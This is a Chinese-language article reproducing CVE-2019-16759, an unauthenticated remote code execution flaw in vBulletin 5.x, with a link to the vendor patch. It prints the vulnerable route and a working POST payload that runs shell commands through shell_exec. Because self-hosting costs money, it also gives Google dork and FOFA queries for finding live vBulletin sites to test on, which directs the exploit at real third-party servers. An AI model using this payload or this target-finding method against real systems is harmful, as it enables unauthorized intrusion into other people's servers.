溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

vBulletin 5.x未授權(quán)RCE漏洞CVE-2019-16759復(fù)現(xiàn)分析

發(fā)布時間:2021-12-20 18:10:28 來源:億速云 閱讀:353 作者:柒染 欄目:大數(shù)據(jù)

vBulletin 5.x未授權(quán)RCE漏洞CVE-2019-16759復(fù)現(xiàn)分析,針對這個問題,這篇文章詳細(xì)介紹了相對應(yīng)的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。


0x00 簡介

vBulletin是一個收費(fèi)低廉但強(qiáng)大的建站BBS(論壇)CMS,該CMS國外大量論壇使用,中國國內(nèi)少許網(wǎng)站使用。近日,vBulletin 5.x爆出一個前臺遠(yuǎn)程代碼執(zhí)行漏洞,無需登錄即可觸發(fā)。該論壇程序在國外的國外的用戶量就類似dz論壇在國內(nèi)的用戶量。

0x01 漏洞概述

漏洞通過請求ajax/render/widget_php進(jìn)行模板注入觸發(fā)代碼執(zhí)行。

0x02 影響范圍

5.0.0 <= vBulletin <=5.5.4

0x03 環(huán)境搭建

自行搭建需要付費(fèi),因此這里使用google語法和FOFA查找

google語法:

site:*.vbulletin.net

Powered by vBulletin

FOFA:

content="vBulletin"
app="vBulletin"

在線靶場獲取方式

轉(zhuǎn)發(fā)本文至朋友圈并截圖發(fā)至公眾號內(nèi)即可

0x04 漏洞利用

進(jìn)入如下vBulletin論壇

vBulletin 5.x未授權(quán)RCE漏洞CVE-2019-16759復(fù)現(xiàn)分析

訪問/index.php?routestring=ajax/render/widget_php會顯示以下結(jié)果

vBulletin 5.x未授權(quán)RCE漏洞CVE-2019-16759復(fù)現(xiàn)分析

然后POST如下數(shù)據(jù)即可執(zhí)行命令whoami

widgetConfig[code] = echo shell_exec('whoami'); exit;

vBulletin 5.x未授權(quán)RCE漏洞CVE-2019-16759復(fù)現(xiàn)分析

0x05 修復(fù)方式

安全更新補(bǔ)丁下載:

http://members.vbulletin.com/patches.php

關(guān)于vBulletin 5.x未授權(quán)RCE漏洞CVE-2019-16759復(fù)現(xiàn)分析問題的解答就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關(guān)注億速云行業(yè)資訊頻道了解更多相關(guān)知識。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI